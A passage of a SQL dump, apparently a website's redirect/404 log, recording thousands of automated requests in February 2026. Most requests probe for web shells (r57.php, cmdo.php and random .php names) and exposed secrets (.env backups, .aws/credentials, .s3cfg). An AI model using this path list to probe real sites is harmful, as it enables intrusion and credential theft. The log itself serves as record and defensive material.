00:00:00',301),(57978,'http://www.3s-technologies.com.tr/tr/wp-scr1pts.php',NULL,'','',2,0,'2026-02-22 05:38:20','0000-00-00 00:00:00',301),(57979,'http://www.3s-technologies.com.tr/tr/ws69.php',NULL,'','',2,0,'2026-02-22 05:38:23','0000-00-00 00:00:00',301),(57980,'http://www.3s-technologies.com.tr/tr/jcrop.php',NULL,'','',3,0,'2026-02-22 05:38:25','0000-00-00 00:00:00',301),(57981,'http://www.3s-technologies.com.tr/tr/wp-link10.php',NULL,'','',2,0,'2026-02-22 05:38:26','0000-00-00 00:00:00',301),(57982,'http://www.3s-technologies.com.tr/tr/h2a2ck.php',NULL,'','',2,0,'2026-02-22 05:38:31','0000-00-00 00:00:00',301),(57983,'http://www.3s-technologies.com.tr/tr/cytyr.php',NULL,'','',2,0,'2026-02-22 05:38:31','0000-00-00 00:00:00',301),(57984,'http://www.3s-technologies.com.tr/tr/ws68.php',NULL,'','',2,0,'2026-02-22 05:38:34','0000-00-00 00:00:00',301),(57985,'http://www.3s-technologies.com.tr/tr/w1px.php',NULL,'','',2,0,'2026-02-22 05:38:35','0000-00-00 00:00:00',301),(57986,'http://www.3s-technologies.com.tr/tr/galer.php',NULL,'','',2,0,'2026-02-22 05:38:36','0000-00-00 00:00:00',301),(57987,'http://www.3s-technologies.com.tr/tr/browse.php',NULL,'','',2,0,'2026-02-22 05:38:37','0000-00-00 00:00:00',301),(57988,'http://www.3s-technologies.com.tr/tr/r57.php',NULL,'','',3,0,'2026-02-22 05:38:39','0000-00-00 00:00:00',301),(57989,'http://www.3s-technologies.com.tr/tr/wp-content/themes/sky-pro/js.php',NULL,'','',1,0,'2026-02-22 10:33:35','0000-00-00 00:00:00',301),(57990,'http://www.3s-technologies.com.tr/tr/okxh.php',NULL,'','',2,0,'2026-02-22 10:33:45','0000-00-00 00:00:00',301),(57991,'http://www.3s-technologies.com.tr/tr/zqhfn.php',NULL,'','',1,0,'2026-02-22 10:33:47','0000-00-00 00:00:00',301),(57992,'http://www.3s-technologies.com.tr/tr/fimai.php',NULL,'','',1,0,'2026-02-22 10:33:52','0000-00-00 00:00:00',301),(57993,'http://www.3s-technologies.com.tr/tr/maul.php',NULL,'','',2,0,'2026-02-22 10:33:54','0000-00-00 00:00:00',301),(57994,'http://www.3s-technologies.com.tr/tr/orouu.php',NULL,'','',1,0,'2026-02-22 10:34:02','0000-00-00 00:00:00',301),(57995,'http://www.3s-technologies.com.tr/tr/kalso.php',NULL,'','',1,0,'2026-02-22 10:34:08','0000-00-00 00:00:00',301),(57996,'http://www.3s-technologies.com.tr/tr/wp-includes/text/diff/index.php',NULL,'','',1,0,'2026-02-22 10:34:16','0000-00-00 00:00:00',301),(57997,'http://www.3s-technologies.com.tr/tr/domains.php',NULL,'','',4,0,'2026-02-22 10:34:20','0000-00-00 00:00:00',301),(57998,'http://www.3s-technologies.com.tr/tr/clss.php',NULL,'','',2,0,'2026-02-22 10:34:21','0000-00-00 00:00:00',301),(57999,'http://www.3s-technologies.com.tr/tr/zc-104.php',NULL,'','',2,0,'2026-02-22 10:34:26','0000-00-00 00:00:00',301),(58000,'http://www.3s-technologies.com.tr/tr/vanda.php',NULL,'','',2,0,'2026-02-22 10:34:29','0000-00-00 00:00:00',301),(58001,'http://www.3s-technologies.com.tr/tr/wp-includes/js/jcrop/jcrop.php',NULL,'','',1,0,'2026-02-22 10:34:34','0000-00-00 00:00:00',301),(58002,'http://www.3s-technologies.com.tr/tr/plugins/function.php',NULL,'','',1,0,'2026-02-22 10:34:35','0000-00-00 00:00:00',301),(58003,'http://www.3s-technologies.com.tr/tr/wp-includes/pomo/index.php',NULL,'','',1,0,'2026-02-22 10:34:36','0000-00-00 00:00:00',301),(58004,'http://www.3s-technologies.com.tr/tr/asd.php',NULL,'','',6,0,'2026-02-22 10:34:41','0000-00-00 00:00:00',301),(58005,'http://www.3s-technologies.com.tr/tr/rzki.php',NULL,'','',2,0,'2026-02-22 10:34:45','0000-00-00 00:00:00',301),(58006,'http://www.3s-technologies.com.tr/tr/function/function.php',NULL,'','',3,0,'2026-02-22 10:34:51','0000-00-00 00:00:00',301),(58007,'http://www.3s-technologies.com.tr/tr/wp-content/languages/plugins/index.php',NULL,'','',1,0,'2026-02-22 10:35:06','0000-00-00 00:00:00',301),(58008,'http://www.3s-technologies.com.tr/tr/wp-admin/css/wp-login.php',NULL,'','',1,0,'2026-02-22 10:35:07','0000-00-00 00:00:00',301),(58009,'http://www.3s-technologies.com.tr/tr/images/all.php',NULL,'','',1,0,'2026-02-22 10:35:08','0000-00-00 00:00:00',301),(58010,'http://www.3s-technologies.com.tr/tr/wp-admin/maint/wp-login.php',NULL,'','',1,0,'2026-02-22 10:35:13','0000-00-00 00:00:00',301),(58011,'http://www.3s-technologies.com.tr/tr/wp-admin/user-new.php',NULL,'','',1,0,'2026-02-22 10:35:18','0000-00-00 00:00:00',301),(58012,'http://www.3s-technologies.com.tr/tr/varb.php',NULL,'','',2,0,'2026-02-22 10:35:21','0000-00-00 00:00:00',301),(58013,'http://www.3s-technologies.com.tr/tr/xxzdc.php',NULL,'','',1,0,'2026-02-22 10:35:24','0000-00-00 00:00:00',301),(58014,'http://www.3s-technologies.com.tr/tr/wp-conf.php',NULL,'','',2,0,'2026-02-22 10:35:31','0000-00-00 00:00:00',301),(58015,'http://www.3s-technologies.com.tr/tr/lm15.php',NULL,'','',2,0,'2026-02-22 10:35:34','0000-00-00 00:00:00',301),(58016,'http://www.3s-technologies.com.tr/tr/d12.php',NULL,'','',3,0,'2026-02-22 10:35:39','0000-00-00 00:00:00',301),(58017,'http://www.3s-technologies.com.tr/tr/bo.php',NULL,'','',2,0,'2026-02-22 10:35:46','0000-00-00 00:00:00',301),(58018,'http://www.3s-technologies.com.tr/tr/a5e0a.php',NULL,'','',2,0,'2026-02-22 10:35:48','0000-00-00 00:00:00',301),(58019,'http://mail.3s-technologies.com.tr/tr/312.php',NULL,'','',1,0,'2026-02-22 12:14:09','0000-00-00 00:00:00',301),(58020,'http://3s-technologies.com.tr/tr/myfile.php',NULL,'','',35,0,'2026-02-22 14:07:53','0000-00-00 00:00:00',301),(58021,'http://mail.3s-technologies.com.tr/tr/ws58.php',NULL,'','',2,0,'2026-02-22 15:05:38','0000-00-00 00:00:00',301),(58022,'http://mail.3s-technologies.com.tr/tr/zu.php',NULL,'','',4,0,'2026-02-22 15:06:00','0000-00-00 00:00:00',301),(58023,'http://mail.3s-technologies.com.tr/tr/gk.php',NULL,'','',15,0,'2026-02-22 15:06:01','0000-00-00 00:00:00',301),(58024,'http://mail.3s-technologies.com.tr/tr/kbfr.php',NULL,'','',8,0,'2026-02-22 15:06:03','0000-00-00 00:00:00',301),(58025,'http://mail.3s-technologies.com.tr/tr/f2.php',NULL,'','',4,0,'2026-02-22 21:10:51','0000-00-00 00:00:00',301),(58026,'http://mail.3s-technologies.com.tr/tr/thui.php',NULL,'','',10,0,'2026-02-22 21:10:52','0000-00-00 00:00:00',301),(58027,'http://mail.3s-technologies.com.tr/tr/selesai.php',NULL,'','',4,0,'2026-02-22 21:10:54','0000-00-00 00:00:00',301),(58028,'http://mail.3s-technologies.com.tr/tr/maraz.php',NULL,'','',4,0,'2026-02-22 21:10:55','0000-00-00 00:00:00',301),(58029,'http://mail.3s-technologies.com.tr/tr/bzjdlofz.php',NULL,'','',4,0,'2026-02-22 21:10:58','0000-00-00 00:00:00',301),(58030,'http://mail.3s-technologies.com.tr/tr/wp-style.php',NULL,'','',4,0,'2026-02-22 21:11:01','0000-00-00 00:00:00',301),(58031,'http://mail.3s-technologies.com.tr/tr/logs1.php',NULL,'','',4,0,'2026-02-22 21:11:03','0000-00-00 00:00:00',301),(58032,'http://mail.3s-technologies.com.tr/tr/lanka.php',NULL,'','',5,0,'2026-02-22 21:11:05','0000-00-00 00:00:00',301),(58033,'http://mail.3s-technologies.com.tr/tr/lkui.php',NULL,'','',5,0,'2026-02-22 21:11:06','0000-00-00 00:00:00',301),(58034,'http://mail.3s-technologies.com.tr/tr/easy.php',NULL,'','',4,0,'2026-02-22 21:11:09','0000-00-00 00:00:00',301),(58035,'http://mail.3s-technologies.com.tr/tr/ccu.php',NULL,'','',9,0,'2026-02-22 21:11:15','0000-00-00 00:00:00',301),(58036,'http://mail.3s-technologies.com.tr/tr/zxekqlxb.php',NULL,'','',4,0,'2026-02-22 21:11:18','0000-00-00 00:00:00',301),(58037,'http://mail.3s-technologies.com.tr/tr/wp-scr1pts.php',NULL,'','',4,0,'2026-02-22 21:11:19','0000-00-00 00:00:00',301),(58038,'http://mail.3s-technologies.com.tr/tr/ws69.php',NULL,'','',4,0,'2026-02-22 21:11:22','0000-00-00 00:00:00',301),(58039,'http://mail.3s-technologies.com.tr/tr/wp-link10.php',NULL,'','',4,0,'2026-02-22 21:11:24','0000-00-00 00:00:00',301),(58040,'http://mail.3s-technologies.com.tr/tr/cytyr.php',NULL,'','',4,0,'2026-02-22 21:11:30','0000-00-00 00:00:00',301),(58041,'http://mail.3s-technologies.com.tr/tr/balin.php',NULL,'','',4,0,'2026-02-22 21:11:33','0000-00-00 00:00:00',301),(58042,'http://mail.3s-technologies.com.tr/tr/0x19493qu8zq.php',NULL,'','',4,0,'2026-02-22 21:11:33','0000-00-00 00:00:00',301),(58043,'http://mail.3s-technologies.com.tr/tr/akhvg.php',NULL,'','',4,0,'2026-02-22 21:11:35','0000-00-00 00:00:00',301),(58044,'http://mail.3s-technologies.com.tr/tr/t00l.php',NULL,'','',15,0,'2026-02-22 21:11:35','0000-00-00 00:00:00',301),(58045,'http://mail.3s-technologies.com.tr/tr/jnhddqyz.php',NULL,'','',4,0,'2026-02-22 21:11:37','0000-00-00 00:00:00',301),(58046,'http://mail.3s-technologies.com.tr/tr/cgi-bin_bkp.php',NULL,'','',4,0,'2026-02-22 21:11:38','0000-00-00 00:00:00',301),(58047,'http://3s-technologies.com.tr/tr/balin.php',NULL,'','',6,0,'2026-02-22 22:08:44','0000-00-00 00:00:00',301),(58048,'http://3s-technologies.com.tr/tr/0x19493qu8zq.php',NULL,'','',6,0,'2026-02-22 22:08:44','0000-00-00 00:00:00',301),(58049,'http://3s-technologies.com.tr/tr/akhvg.php',NULL,'','',6,0,'2026-02-22 22:08:46','0000-00-00 00:00:00',301),(58050,'http://3s-technologies.com.tr/tr/t00l.php',NULL,'','',24,0,'2026-02-22 22:08:46','0000-00-00 00:00:00',301),(58051,'http://3s-technologies.com.tr/tr/jnhddqyz.php',NULL,'','',6,0,'2026-02-22 22:08:48','0000-00-00 00:00:00',301),(58052,'http://3s-technologies.com.tr/tr/cgi-bin_bkp.php',NULL,'','',6,0,'2026-02-22 22:08:49','0000-00-00 00:00:00',301),(58053,'http://3s-technologies.com.tr/tr/abhjr.php',NULL,'','',4,0,'2026-02-22 22:59:25','0000-00-00 00:00:00',301),(58054,'http://3s-technologies.com.tr/tr/anczg.php',NULL,'','',4,0,'2026-02-22 22:59:25','0000-00-00 00:00:00',301),(58055,'http://3s-technologies.com.tr/tr/ardsw.php',NULL,'','',4,0,'2026-02-22 22:59:26','0000-00-00 00:00:00',301),(58056,'http://3s-technologies.com.tr/tr/atfis.php',NULL,'','',4,0,'2026-02-22 22:59:26','0000-00-00 00:00:00',301),(58057,'http://3s-technologies.com.tr/tr/azpaq.php',NULL,'','',4,0,'2026-02-22 22:59:27','0000-00-00 00:00:00',301),(58058,'http://3s-technologies.com.tr/tr/bclms.php',NULL,'','',4,0,'2026-02-22 22:59:27','0000-00-00 00:00:00',301),(58059,'http://3s-technologies.com.tr/tr/bivvw.php',NULL,'','',4,0,'2026-02-22 22:59:28','0000-00-00 00:00:00',301),(58060,'http://3s-technologies.com.tr/tr/bykdo.php',NULL,'','',5,0,'2026-02-22 22:59:28','0000-00-00 00:00:00',301),(58061,'http://3s-technologies.com.tr/tr/byueb.php',NULL,'','',4,0,'2026-02-22 22:59:29','0000-00-00 00:00:00',301),(58062,'http://3s-technologies.com.tr/tr/cjndd.php',NULL,'','',4,0,'2026-02-22 22:59:29','0000-00-00 00:00:00',301),(58063,'http://3s-technologies.com.tr/tr/coiuz.php',NULL,'','',4,0,'2026-02-22 22:59:30','0000-00-00 00:00:00',301),(58064,'http://3s-technologies.com.tr/tr/ctjpseby.php',NULL,'','',4,0,'2026-02-22 22:59:31','0000-00-00 00:00:00',301),(58065,'http://3s-technologies.com.tr/tr/cxxuv.php',NULL,'','',6,0,'2026-02-22 22:59:31','0000-00-00 00:00:00',301),(58066,'http://3s-technologies.com.tr/tr/dawvg.php',NULL,'','',4,0,'2026-02-22 22:59:32','0000-00-00 00:00:00',301),(58067,'http://3s-technologies.com.tr/tr/dhjqs.php',NULL,'','',4,0,'2026-02-22 22:59:32','0000-00-00 00:00:00',301),(58068,'http://3s-technologies.com.tr/tr/diayd.php',NULL,'','',4,0,'2026-02-22 22:59:33','0000-00-00 00:00:00',301),(58069,'http://3s-technologies.com.tr/tr/dljpy.php',NULL,'','',4,0,'2026-02-22 22:59:33','0000-00-00 00:00:00',301),(58070,'http://3s-technologies.com.tr/tr/dqagu.php',NULL,'','',4,0,'2026-02-22 22:59:34','0000-00-00 00:00:00',301),(58071,'http://3s-technologies.com.tr/tr/druqr.php',NULL,'','',4,0,'2026-02-22 22:59:34','0000-00-00 00:00:00',301),(58072,'http://3s-technologies.com.tr/tr/dyxbc.php',NULL,'','',4,0,'2026-02-22 22:59:35','0000-00-00 00:00:00',301),(58073,'http://3s-technologies.com.tr/tr/eapjf.php',NULL,'','',4,0,'2026-02-22 22:59:35','0000-00-00 00:00:00',301),(58074,'http://3s-technologies.com.tr/tr/ebuom.php',NULL,'','',4,0,'2026-02-22 22:59:36','0000-00-00 00:00:00',301),(58075,'http://3s-technologies.com.tr/tr/emcgm.php',NULL,'','',4,0,'2026-02-22 22:59:36','0000-00-00 00:00:00',301),(58076,'http://3s-technologies.com.tr/tr/euocu.php',NULL,'','',4,0,'2026-02-22 22:59:37','0000-00-00 00:00:00',301),(58077,'http://3s-technologies.com.tr/tr/frdyx.php',NULL,'','',4,0,'2026-02-22 22:59:38','0000-00-00 00:00:00',301),(58078,'http://3s-technologies.com.tr/tr/fsjzs.php',NULL,'','',4,0,'2026-02-22 22:59:38','0000-00-00 00:00:00',301),(58079,'http://3s-technologies.com.tr/tr/fwtoa.php',NULL,'','',4,0,'2026-02-22 22:59:39','0000-00-00 00:00:00',301),(58080,'http://3s-technologies.com.tr/tr/gbhyv.php',NULL,'','',4,0,'2026-02-22 22:59:39','0000-00-00 00:00:00',301),(58081,'http://3s-technologies.com.tr/tr/gedim.php',NULL,'','',4,0,'2026-02-22 22:59:40','0000-00-00 00:00:00',301),(58082,'http://3s-technologies.com.tr/tr/ibano.php',NULL,'','',4,0,'2026-02-22 22:59:41','0000-00-00 00:00:00',301),(58083,'http://3s-technologies.com.tr/tr/ifrea.php',NULL,'','',4,0,'2026-02-22 22:59:41','0000-00-00 00:00:00',301),(58084,'http://3s-technologies.com.tr/tr/itlvk.php',NULL,'','',4,0,'2026-02-22 22:59:42','0000-00-00 00:00:00',301),(58085,'http://3s-technologies.com.tr/tr/jctyd.php',NULL,'','',4,0,'2026-02-22 22:59:42','0000-00-00 00:00:00',301),(58086,'http://3s-technologies.com.tr/tr/jtfocpif.php',NULL,'','',4,0,'2026-02-22 22:59:43','0000-00-00 00:00:00',301),(58087,'http://3s-technologies.com.tr/tr/junvh.php',NULL,'','',4,0,'2026-02-22 22:59:43','0000-00-00 00:00:00',301),(58088,'http://3s-technologies.com.tr/tr/jvtsa.php',NULL,'','',4,0,'2026-02-22 22:59:44','0000-00-00 00:00:00',301),(58089,'http://3s-technologies.com.tr/tr/kaduu.php',NULL,'','',4,0,'2026-02-22 22:59:44','0000-00-00 00:00:00',301),(58090,'http://3s-technologies.com.tr/tr/kagug.php',NULL,'','',4,0,'2026-02-22 22:59:45','0000-00-00 00:00:00',301),(58091,'http://3s-technologies.com.tr/tr/kandw.php',NULL,'','',4,0,'2026-02-22 22:59:45','0000-00-00 00:00:00',301),(58092,'http://3s-technologies.com.tr/tr/kduhq.php',NULL,'','',4,0,'2026-02-22 22:59:46','0000-00-00 00:00:00',301),(58093,'http://3s-technologies.com.tr/tr/rgjrq.php',NULL,'','',4,0,'2026-02-22 22:59:46','0000-00-00 00:00:00',301),(58094,'http://3s-technologies.com.tr/tr/vopxx.php',NULL,'','',4,0,'2026-02-22 22:59:47','0000-00-00 00:00:00',301),(58095,'http://3s-technologies.com.tr/tr/wcoiw.php',NULL,'','',4,0,'2026-02-22 22:59:47','0000-00-00 00:00:00',301),(58096,'http://3s-technologies.com.tr/tr/wtogs.php',NULL,'','',4,0,'2026-02-22 22:59:48','0000-00-00 00:00:00',301),(58097,'http://3s-technologies.com.tr/tr/xbbih.php',NULL,'','',4,0,'2026-02-22 22:59:48','0000-00-00 00:00:00',301),(58098,'http://3s-technologies.com.tr/tr/xcakx.php',NULL,'','',4,0,'2026-02-22 22:59:49','0000-00-00 00:00:00',301),(58099,'http://3s-technologies.com.tr/tr/xjgdw.php',NULL,'','',4,0,'2026-02-22 22:59:49','0000-00-00 00:00:00',301),(58100,'http://3s-technologies.com.tr/tr/xopgt.php',NULL,'','',4,0,'2026-02-22 22:59:50','0000-00-00 00:00:00',301),(58101,'http://3s-technologies.com.tr/tr/xsjtz.php',NULL,'','',4,0,'2026-02-22 22:59:50','0000-00-00 00:00:00',301),(58102,'http://3s-technologies.com.tr/tr/zvinn.php',NULL,'','',5,0,'2026-02-22 22:59:51','0000-00-00 00:00:00',301),(58103,'http://3s-technologies.com.tr/tr/cmdo.php',NULL,'','',1,0,'2026-02-23 02:32:31','0000-00-00 00:00:00',301),(58104,'https://3s-technologies.com.tr/tr/_debugbar',NULL,'https://3s-technologies.com.tr/_debugbar/','',5,0,'2026-02-23 03:33:32','0000-00-00 00:00:00',301),(58105,'https://3s-technologies.com.tr/tr/debugbar',NULL,'https://3s-technologies.com.tr/debugbar/','',5,0,'2026-02-23 03:33:33','0000-00-00 00:00:00',301),(58106,'https://3s-technologies.com.tr/tr/debug',NULL,'https://3s-technologies.com.tr/debug/','',5,0,'2026-02-23 03:33:33','0000-00-00 00:00:00',301),(58107,'https://3s-technologies.com.tr/tr/aws-credentials',NULL,'https://3s-technologies.com.tr/aws-credentials','',5,0,'2026-02-23 03:33:36','0000-00-00 00:00:00',301),(58108,'https://3s-technologies.com.tr/tr/aws.json',NULL,'https://3s-technologies.com.tr/aws.json','',5,0,'2026-02-23 03:33:37','0000-00-00 00:00:00',301),(58109,'https://3s-technologies.com.tr/tr/.s3cfg',NULL,'https://3s-technologies.com.tr/.s3cfg','',5,0,'2026-02-23 03:33:37','0000-00-00 00:00:00',301),(58110,'https://mail.3s-technologies.com.tr/tr/\"/templates/beez5/javascript/hide.js\"',NULL,'https://mail.3s-technologies.com.tr/%22/templates/beez5/javascript/hide.js%22','',3,0,'2026-02-23 05:24:25','0000-00-00 00:00:00',301),(58111,'https://mail.3s-technologies.com.tr/tr/\"/media/system/js/caption.js?59b9a97f81c129b0e3167385c8580231\"',NULL,'https://mail.3s-technologies.com.tr/%22/media/system/js/caption.js?59b9a97f81c129b0e3167385c8580231\"','',3,0,'2026-02-23 05:24:26','0000-00-00 00:00:00',301),(58112,'https://mail.3s-technologies.com.tr/tr/\"/media/djextensions/jquery-easing/jquery.easing.min.js\"',NULL,'https://mail.3s-technologies.com.tr/%22/media/djextensions/jquery-easing/jquery.easing.min.js%22','',3,0,'2026-02-23 05:24:26','0000-00-00 00:00:00',301),(58113,'https://mail.3s-technologies.com.tr/tr/\"/media/system/js/html5fallback.js?59b9a97f81c129b0e3167385c8580231\"',NULL,'https://mail.3s-technologies.com.tr/%22/media/system/js/html5fallback.js?59b9a97f81c129b0e3167385c8580231\"','',3,0,'2026-02-23 05:24:27','0000-00-00 00:00:00',301),(58114,'https://mail.3s-technologies.com.tr/tr/\"/templates/beez5/javascript/md_stylechanger.js\"',NULL,'https://mail.3s-technologies.com.tr/%22/templates/beez5/javascript/md_stylechanger.js%22','',3,0,'2026-02-23 05:24:27','0000-00-00 00:00:00',301),(58115,'https://mail.3s-technologies.com.tr/tr/\"/modules/mod_djimageslider/assets/js/slider.js?v=4.1.1\"',NULL,'https://mail.3s-technologies.com.tr/%22/modules/mod_djimageslider/assets/js/slider.js?v=4.1.1\"','',3,0,'2026-02-23 05:24:27','0000-00-00 00:00:00',301),(58116,'https://mail.3s-technologies.com.tr/tr/\"/components/com_virtuemart/assets/js/vmsite.js?vmver=1ca80efd\"',NULL,'https://mail.3s-technologies.com.tr/%22/components/com_virtuemart/assets/js/vmsite.js?vmver=1ca80efd\"','',3,0,'2026-02-23 05:24:27','0000-00-00 00:00:00',301),(58117,'https://mail.3s-technologies.com.tr/tr/\"/media/system/js/mootools-more.js?59b9a97f81c129b0e3167385c8580231\"',NULL,'https://mail.3s-technologies.com.tr/%22/media/system/js/mootools-more.js?59b9a97f81c129b0e3167385c8580231\"','',2,0,'2026-02-23 05:24:27','0000-00-00 00:00:00',301),(58118,'https://mail.3s-technologies.com.tr/tr/\"/modules/mod_virtuemart_cart/assets/js/update_cart.js?vmver=1ca80efd\"',NULL,'https://mail.3s-technologies.com.tr/%22/modules/mod_virtuemart_cart/assets/js/update_cart.js?vmver=1ca80efd\"','',3,0,'2026-02-23 05:24:27','0000-00-00 00:00:00',301),(58119,'https://mail.3s-technologies.com.tr/tr/\"/components/com_virtuemart/assets/js/chosen.jquery.min.js?vmver=1ca80efd\"',NULL,'https://mail.3s-technologies.com.tr/%22/components/com_virtuemart/assets/js/chosen.jquery.min.js?vmver=1ca80efd\"','',3,0,'2026-02-23 05:24:27','0000-00-00 00:00:00',301),(58120,'https://mail.3s-technologies.com.tr/tr/\"/media/jui/js/jquery.min.js?59b9a97f81c129b0e3167385c8580231\"',NULL,'https://mail.3s-technologies.com.tr/%22/media/jui/js/jquery.min.js?59b9a97f81c129b0e3167385c8580231\"','',3,0,'2026-02-23 05:24:27','0000-00-00 00:00:00',301),(58121,'https://mail.3s-technologies.com.tr/tr/\"/media/system/js/mootools-core.js?59b9a97f81c129b0e3167385c8580231\"',NULL,'https://mail.3s-technologies.com.tr/%22/media/system/js/mootools-core.js?59b9a97f81c129b0e3167385c8580231\"','',3,0,'2026-02-23 05:24:28','0000-00-00 00:00:00',301),(58122,'https://mail.3s-technologies.com.tr/tr/\"/media/system/js/core.js?59b9a97f81c129b0e3167385c8580231\"',NULL,'https://mail.3s-technologies.com.tr/%22/media/system/js/core.js?59b9a97f81c129b0e3167385c8580231\"','',1,0,'2026-02-23 05:24:28','0000-00-00 00:00:00',301),(58123,'https://mail.3s-technologies.com.tr/tr/\"/media/jui/js/jquery-migrate.min.js?59b9a97f81c129b0e3167385c8580231\"',NULL,'https://mail.3s-technologies.com.tr/%22/media/jui/js/jquery-migrate.min.js?59b9a97f81c129b0e3167385c8580231\"','',3,0,'2026-02-23 05:24:28','0000-00-00 00:00:00',301),(58124,'https://mail.3s-technologies.com.tr/tr/.env.bak',NULL,'https://mail.3s-technologies.com.tr/.env.bak','',3,0,'2026-02-23 05:24:28','0000-00-00 00:00:00',301),(58125,'https://mail.3s-technologies.com.tr/tr/.env.save',NULL,'https://mail.3s-technologies.com.tr/.env.save','',3,0,'2026-02-23 05:24:29','0000-00-00 00:00:00',301),(58126,'https://mail.3s-technologies.com.tr/tr/.env.backup',NULL,'https://mail.3s-technologies.com.tr/.env.backup','',3,0,'2026-02-23 05:24:29','0000-00-00 00:00:00',301),(58127,'https://mail.3s-technologies.com.tr/tr/backend/.env',NULL,'https://mail.3s-technologies.com.tr/backend/.env','',3,0,'2026-02-23 05:24:30','0000-00-00 00:00:00',301),(58128,'https://mail.3s-technologies.com.tr/tr/config.js',NULL,'https://mail.3s-technologies.com.tr/config.js','',3,0,'2026-02-23 05:24:32','0000-00-00 00:00:00',301),(58129,'https://mail.3s-technologies.com.tr/tr/aws-config.js',NULL,'https://mail.3s-technologies.com.tr/aws-config.js','',3,0,'2026-02-23 05:24:32','0000-00-00 00:00:00',301),(58130,'https://mail.3s-technologies.com.tr/tr/aws.config.js',NULL,'https://mail.3s-technologies.com.tr/aws.config.js','',3,0,'2026-02-23 05:24:33','0000-00-00 00:00:00',301),(58131,'https://mail.3s-technologies.com.tr/tr/_debugbar',NULL,'https://mail.3s-technologies.com.tr/_debugbar/','',3,0,'2026-02-23 05:24:33','0000-00-00 00:00:00',301),(58132,'https://mail.3s-technologies.com.tr/tr/debugbar',NULL,'https://mail.3s-technologies.com.tr/debugbar/','',3,0,'2026-02-23 05:24:34','0000-00-00 00:00:00',301),(58133,'https://mail.3s-technologies.com.tr/tr/debug',NULL,'https://mail.3s-technologies.com.tr/debug/','',3,0,'2026-02-23 05:24:34','0000-00-00 00:00:00',301),(58134,'https://mail.3s-technologies.com.tr/tr/.aws/credentials',NULL,'https://mail.3s-technologies.com.tr/.aws/credentials','',3,0,'2026-02-23 05:24:37','0000-00-00 00:00:00',301),(58135,'https://mail.3s-technologies.com.tr/tr/.aws/config',NULL,'https://mail.3s-technologies.com.tr/.aws/config','',3,0,'2026-02-23 05:24:38','0000-00-00 00:00:00',301),(58136,'https://mail.3s-technologies.com.tr/tr/aws-credentials',NULL,'https://mail.3s-technologies.com.tr/aws-credentials','',3,0,'2026-02-23 05:24:38','0000-00-00 00:00:00',301),(58137,'https://mail.3s-technologies.com.tr/tr/aws.json',NULL,'https://mail.3s-technologies.com.tr/aws.json','',3,0,'2026-02-23 05:24:39','0000-00-00 00:00:00',301),(58138,'https://mail.3s-technologies.com.tr/tr/.s3cfg',NULL,'https://mail.3s-technologies.com.tr/.s3cfg','',3,0,'2026-02-23 05:24:40','0000-00-00 00:00:00',301),(58139,'http://3s-technologies.com.tr/tr/wpxadmin.php',NULL,'','',1,0,'2026-02-23 16:23:52','0000-00-00 00:00:00',301),(58140,'http://mail.3s-technologies.com.tr/tr/tx64.php',NULL,'','',1,0,'2026-02-23 20:19:21','0000-00-00 00:00:00',301),(58141,'http://mail.3s-technologies.com.tr/tr/x3x.php',NULL,'','',5,0,'2026-02-23 20:19:24','0000-00-00 00:00:00',301),(58142,'http://mail.3s-technologies.com.tr/tr/securepassword.php',NULL,'','',1,0,'2026-02-23 20:19:37','0000-00-00 00:00:00',301),(58143,'http://mail.3s-technologies.com.tr/tr/w1px.php',NULL,'','',1,0,'2026-02-23 20:19:42','0000-00-00 00:00:00',301),(58144,'http://mail.3s-technologies.com.tr/tr/ws68.php',NULL,'','',5,0,'2026-02-23 20:20:17','0000-00-00 00:00:00',301),(58145,'http://mail.3s-technologies.com.tr/tr/galer.php',NULL,'','',1,0,'2026-02-23 20:20:19','0000-00-00 00:00:00',301),(58146,'http://mail.3s-technologies.com.tr/tr/eursi.php',NULL,'','',4,0,'2026-02-23 20:20:20','0000-00-00 00:00:00',301),(58147,'http://mail.3s-technologies.com.tr/tr/ws65.php',NULL,'','',1,0,'2026-02-23 20:20:29','0000-00-00 00:00:00',301),(58148,'http://mail.3s-technologies.com.tr/tr/nzilpby53hv.php',NULL,'','',1,0,'2026-02-23 20:20:30','0000-00-00 00:00:00',301),(58149,'http://mail.3s-technologies.com.tr/tr/wy2wogsbpzj.php',NULL,'','',1,0,'2026-02-23 20:20:30','0000-00-00 00:00:00',301),(58150,'http://mail.3s-technologies.com.tr/tr/vkcrnlspuc2.php',NULL,'','',1,0,'2026-02-23 20:20:31','0000-00-00 00:00:00',301),(58151,'http://3s-technologies.com.tr/tr/ws65.php',NULL,'','',1,0,'2026-02-23 21:23:42','0000-00-00 00:00:00',301),(58152,'http://3s-technologies.com.tr/tr/nzilpby53hv.php',NULL,'','',1,0,'2026-02-23 21:23:43','0000-00-00 00:00:00',301),(58153,'http://3s-technologies.com.tr/tr/wy2wogsbpzj.php',NULL,'','',1,0,'2026-02-23 21:23:43','0000-00-00 00:00:00',301),(58154,'http://3s-technologies.com.tr/tr/vkcrnlspuc2.php',NULL,'','',1,0,'2026-02-23 21:23:44','0000-00-00 00:00:00',301),(58155,'http://www.3s-technologies.com.tr/tr/all.php',NULL,'','',1,0,'2026-02-24 07:34:07','0000-00-00 00:00:00',301),(58156,'http://www.3s-technologies.com.tr/tr/tx64.php',NULL,'','',1,0,'2026-02-24 07:34:09','0000-00-00 00:00:00',301),(58157,'http://www.3s-technologies.com.tr/tr/x3x.php',NULL,'','',2,0,'2026-02-24 07:34:12','0000-00-00 00:00:00',301),(58158,'http://www.3s-technologies.com.tr/tr/public/vx.php',NULL,'','',8,0,'2026-02-24 07:34:19','0000-00-00 00:00:00',301),(58159,'http://www.3s-technologies.com.tr/tr/securepassword.php',NULL,'','',1,0,'2026-02-24 07:34:28','0000-00-00 00:00:00',301),(58160,'http://www.3s-technologies.com.tr/tr/akhvg.php',NULL,'','',1,0,'2026-02-24 07:34:35','0000-00-00 00:00:00',301),(58161,'http://www.3s-technologies.com.tr/tr/jnhddqyz.php',NULL,'','',1,0,'2026-02-24 07:34:39','0000-00-00 00:00:00',301),(58162,'http://www.3s-technologies.com.tr/tr/cgi-bin_bkp.php',NULL,'','',1,0,'2026-02-24 07:34:45','0000-00-00 00:00:00',301),(58163,'http://www.3s-technologies.com.tr/tr/xy.php',NULL,'','',3,0,'2026-02-24 07:34:47','0000-00-00 00:00:00',301),(58164,'http://www.3s-technologies.com.tr/tr/balin.php',NULL,'','',1,0,'2026-02-24 07:35:06','0000-00-00 00:00:00',301),(58165,'http://www.3s-technologies.com.tr/tr/mcs.php',NULL,'','',2,0,'2026-02-24 07:35:08','0000-00-00 00:00:00',301),(58166,'http://www.3s-technologies.com.tr/tr/eursi.php',NULL,'','',1,0,'2026-02-24 07:35:20','0000-00-00 